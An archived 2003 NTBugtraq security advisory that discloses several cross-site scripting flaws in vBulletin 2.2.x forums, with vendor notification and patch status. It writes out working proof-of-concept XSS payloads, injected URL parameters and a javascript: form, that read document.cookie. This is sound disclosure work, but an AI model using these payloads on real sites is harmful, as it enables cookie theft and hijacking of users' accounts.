vBulletin Multiple Cross Site Scripting Vulnerabilities

From: Roberto (roberto_at_XDESIGN.IT)
Date: 09/17/03

  • Next message: Tony: "DNS Hijacking: The largest single breach of privacy and security thus far online..."
    Date:         Wed, 17 Sep 2003 18:03:55 +0100
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
    
    

    SYSTEMS AFFECTED ========

    Jelsoft Enterprises vBulletin Forum

    (exploited with a browser)

    CONTENTS =========

    Subject: vBulletin Multiple Cross Site Scripting Vulnerabilities

    Date: 17 September 2003 (release from old archive, flaws found on 7 September 2002)

    Risk: Low

    DESCRIPTION =========

    The vBulletin Forum can be forced to return malicious content in user's browser.

    There are multiple CSS vulnerabilities (version 3.0 and prior).

    DETAILS =========

    1) The first bug affects vBulletin version 2.2.7, 2.2.6 and probably previous versions.

    The "aim" parameter is not filtered, then is possible the execution of malicious code:

    www.host.com/forum/member.php?s=&action=aimmessage&aim=<script>alert(document.cookie)</script>

    2) The second one is more difficult to exploit and affects only 2.2.6 (or previous).

    Folder names allow execution of code. Version 2.2.7 seems to patch this flaw.

    Type in a browser:

    javascript:document.write('<form name="form1" action="http://www.host.com/forum/private.php" method="post"><input

    type="hidden" name="s" value=""><input type="hidden" name="highest" value="3"><input type="hidden"

    name="folderlist[2]" value="<script>alert(document.cookie)</script>"><input type="hidden" name="folderlist[3]"

    value=""><input type="hidden" name="folderlist[4]" value=""><input type="hidden" name="action"

    value="doeditfolders"><input type="submit" name="submit" value="write to me"></form>');

    3) The third bug is exploited through the "membername" parameter in Quickfind form.

    Tested on 2.2.6 with quickfind enabled (it's an hack).

    4) CSS in Lost Password form:

    www.host.com/forum/member.php?s=&action=lostpw&url="><script>alert(document.cookie)</script>

    5) CSS in showthread, word highlight function:

    www.host.com/forum/showthread.php?s=&threadid=xxxx&highlight="><script>alert(document.cookie)</script>

    6) CSS on 2.2.9 and prior. Type this in a forum index page:

    javascript:who(document.cookie)

    RISKS ==========

    Stealing cookies which may contain critical data (personal informations,
    passwords, etc).

    WORKAROUNDS ========

    Upgrade to new releases.

    VENDOR STATUS ========

    vBulletin programmers were notified on 7 September 2002.

    All the flaws are already patched from the version 2.2.8 (also for the 3.0 beta).

    DISCLAIMER ========

    These informations are supplied for educational purpose only.

    The author is not liable for the direct or indirect use of these

    informations, which can't be used in order to modify or interrupt the operations

    of informatic systems.

    LEGAL NOTICE ========

    This advisory is Copyright (c) 2003 Roberto Dapino.

    It can be reproduced without the author's written permission

    only if unmodified.

    CREDITS =========

    Vulnerabilites found by Roberto Dapino, Italy. - roberto@xdesign.it

    Special thanks to: vBulletin Programmers.

    xdesign.it - stormvision.it

    ----
    Are You "Certifiable"? Summer's Hottest Certification Just Got HOTTER!
    With a growth rate exceeding 110%, the TICSA security practitioner
    certification is one of the hottest IT credentials available.  And now, for
    a limited time, you can save 33% off of the TICSA certification exam! To
    learn more about the TICSA certification, and to register as a TICSA
    candidate online, just go to
    http://www.trusecure.com/offer/s0100/
    ----
    

  • Next message: Tony: "DNS Hijacking: The largest single breach of privacy and security thus far online..."

    Relevant Pages

    • Re: Alert: Microsoft Security Bulletin - MS03-039
      ... The way that Microsoft patched the new RPC Part II vulnerability ... Summer's Hottest Certification Just Got HOTTER! ... To learn more about the TICSA certification, ...
      (NT-Bugtraq)
    • Windows 2000 server issue
      ... accurately parse the lists of vulnerable machines produced by the scan ... of addresses directly on the script. ... Summer's Hottest Certification Just Got HOTTER! ... you can save 33% off of the TICSA certification ...
      (NT-Bugtraq)
    • Re: Drivial Pursuit: Internet Explorer Browser & Your Files and Folders !
      ... The default Enhanced Security Configuration of IE ... access to files and folders on the local machine from the internet. ... With a growth rate exceeding 110%, the TICSA security practitioner certification is one of the hottest IT credentials available. ... And now, for a limited time, you can save 33% off of the TICSA certification exam! ...
      (NT-Bugtraq)
    • Re: Microsoft Numbering System
      ... the patch for each systems affected. ... in the right frame. ... Summer's Hottest Certification Just Got HOTTER! ... you can save 33% off of the TICSA certification exam! ...
      (NT-Bugtraq)
    • Re: SP4 Problems
      ... Rebooted numerous times, all ... Rebooting to safe mode produced an extremely slow logon, ... Summer's Hottest Certification Just Got HOTTER! ... you can save 33% off of the TICSA certification exam! ...
      (NT-Bugtraq)